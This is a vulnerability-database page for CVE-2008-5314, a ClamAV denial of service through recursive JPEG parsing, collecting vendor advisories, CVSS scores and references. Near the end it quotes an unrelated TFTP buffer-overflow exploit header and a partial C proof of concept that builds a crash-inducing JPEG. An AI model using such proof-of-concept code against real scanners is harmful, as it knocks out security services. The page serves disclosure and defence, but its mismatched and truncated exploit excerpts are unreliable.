CVE-2008-5314
published 2008-12-03CVE-2008-5314: Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 allows remote attackers to cause a denial of service (daemon crash) via a…
PriorityP422medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
8.20%
94.2th percentile
Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 allows remote attackers to cause a denial of service (daemon crash) via a crafted JPEG file, related to the cli_check_jpeg_exploit, jpeg_check_photoshop, and jpeg_check_photoshop_8bim functions.
Affected
46 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| clam_anti-virus | clamav | <= 0.94.1 | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
osv4.3MEDIUM
vendor_debian4.3MEDIUM
vendor_redhat4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-73rj-52cv-hrpx: Stack consumption vulnerability in libclamav/special
ghsa_unreviewed·2022-05-17
CVE-2008-5314 [MEDIUM] GHSA-73rj-52cv-hrpx: Stack consumption vulnerability in libclamav/special
Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 allows remote attackers to cause a denial of service (daemon crash) via a crafted JPEG file, related to the cli_check_jpeg_exploit, jpeg_check_photoshop, and jpeg_check_photoshop_8bim functions.
OSV
CVE-2008-5314: Stack consumption vulnerability in libclamav/special
osv·2008-12-03·CVSS 4.3
CVE-2008-5314 [MEDIUM] CVE-2008-5314: Stack consumption vulnerability in libclamav/special
Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 allows remote attackers to cause a denial of service (daemon crash) via a crafted JPEG file, related to the cli_check_jpeg_exploit, jpeg_check_photoshop, and jpeg_check_photoshop_8bim functions.
Ubuntu
ClamAV vulnerability
vendor_ubuntu·2008-12-02
CVE-2008-5314 ClamAV vulnerability
Title: ClamAV vulnerability
Summary: ClamAV vulnerability
Ilja van Sprundel discovered that ClamAV did not handle recursive JPEG
information. If a remote attacker sent a specially crafted JPEG file,
ClamAV would crash, leading to a denial of service.
Instructions: In general, a standard system upgrade is sufficient to effect the
necessary changes.
Red Hat
clamav: DoS / crash via crafted jpeg image
vendor_redhat·2008-12-01·CVSS 4.3
CVE-2008-5314 [MEDIUM] clamav: DoS / crash via crafted jpeg image
clamav: DoS / crash via crafted jpeg image
Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 allows remote attackers to cause a denial of service (daemon crash) via a crafted JPEG file, related to the cli_check_jpeg_exploit, jpeg_check_photoshop, and jpeg_check_photoshop_8bim functions.
Debian
CVE-2008-5314: clamav - Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 a...
vendor_debian·2008·CVSS 4.3
CVE-2008-5314 [MEDIUM] CVE-2008-5314: clamav - Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 a...
Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 allows remote attackers to cause a denial of service (daemon crash) via a crafted JPEG file, related to the cli_check_jpeg_exploit, jpeg_check_photoshop, and jpeg_check_photoshop_8bim functions.
Scope: local
bookworm: resolved (fixed in 0.94.dfsg.2-1)
bullseye: resolved (fixed in 0.94.dfsg.2-1)
forky: resolved (fixed in 0.94.dfsg.2-1)
sid: resolved (fixed in 0.94.dfsg.2-1)
trixie: resolved (fixed in 0.94.dfsg.2-1)
No detection rules found.
Exploit-DB
TFTP Server 1.4 - ST 'RRQ' Remote Buffer Overflow
exploitdb·2012-01-10
CVE-2008-1611 TFTP Server 1.4 - ST 'RRQ' Remote Buffer Overflow
TFTP Server 1.4 - ST 'RRQ' Remote Buffer Overflow
---
#!/usr/bin/python
#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) #
# OS: Windows XP PRO SP3 #
# Author: b33f #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise... #
# #
# This tftp service have been pwned extensively: #
# (1) Muts ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/5314/ #
# (2) Molotov ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/10542/ #
# (3) tixxDZ ==> ERROR Overflow #
# http://www.exploit-db.com/exploits/5563/ #
# #
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sen
Exploit-DB
ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC)
exploitdb·2008-12-03
CVE-2008-5314 ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC)
ClamAV
#include
#include
#define NR_ITER 200000
int main() {
FILE *fp;
int i;
fp = fopen("clamav-jpeg-crash.jpg", "w+");
if (!fp) {
printf("can't open/create file\n");
exit(0);
}
for (i = 0; i < NR_ITER; i++) {
fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1,
fp);
}
fclose(fp);
printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n");
exit(0);
}
/*
result:
ilja@opensolaris:~$ ./jpg
done, now run clamscan on ./clamav-jpeg-crash.jpg
ilja@opensolaris:~$ /usr/local/bin/clamscan ./clamav-jpeg-crash.jpg
LibClamAV Warning: **************************************************
LibClamAV Warning: *** The virus database is older than 7 days! ***
LibClamAV Warning: *** Please update it as soon as possible. ***
LibClamAV Warning: **************************************************
Se
http://lists.apple.com/archives/security-announce/2009/Feb/msg00000.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-12/msg00003.htmlhttp://lurker.clamav.net/message/20081126.150241.55b1e092.en.htmlhttp://osvdb.org/50363http://secunia.com/advisories/32926http://secunia.com/advisories/32936http://secunia.com/advisories/33016http://secunia.com/advisories/33195http://secunia.com/advisories/33317http://secunia.com/advisories/33937http://security.gentoo.org/glsa/glsa-200812-21.xmlhttp://sourceforge.net/project/shownotes.php?group_id=86638&release_id=643134http://support.apple.com/kb/HT3438http://www.debian.org/security/2008/dsa-1680http://www.mandriva.com/security/advisories?name=MDVSA-2008:239http://www.openwall.com/lists/oss-security/2008/12/01/8http://www.securityfocus.com/bid/32555http://www.securitytracker.com/id?1021296http://www.ubuntu.com/usn/usn-684-1http://www.vupen.com/english/advisories/2008/3311http://www.vupen.com/english/advisories/2009/0422https://exchange.xforce.ibmcloud.com/vulnerabilities/46985https://www.exploit-db.com/exploits/7330https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1266http://lists.apple.com/archives/security-announce/2009/Feb/msg00000.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-12/msg00003.htmlhttp://lurker.clamav.net/message/20081126.150241.55b1e092.en.htmlhttp://osvdb.org/50363http://secunia.com/advisories/32926http://secunia.com/advisories/32936http://secunia.com/advisories/33016http://secunia.com/advisories/33195http://secunia.com/advisories/33317http://secunia.com/advisories/33937http://security.gentoo.org/glsa/glsa-200812-21.xmlhttp://sourceforge.net/project/shownotes.php?group_id=86638&release_id=643134http://support.apple.com/kb/HT3438http://www.debian.org/security/2008/dsa-1680http://www.mandriva.com/security/advisories?name=MDVSA-2008:239http://www.openwall.com/lists/oss-security/2008/12/01/8http://www.securityfocus.com/bid/32555http://www.securitytracker.com/id?1021296http://www.ubuntu.com/usn/usn-684-1http://www.vupen.com/english/advisories/2008/3311http://www.vupen.com/english/advisories/2009/0422https://exchange.xforce.ibmcloud.com/vulnerabilities/46985https://www.exploit-db.com/exploits/7330https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1266
2008-12-03
Published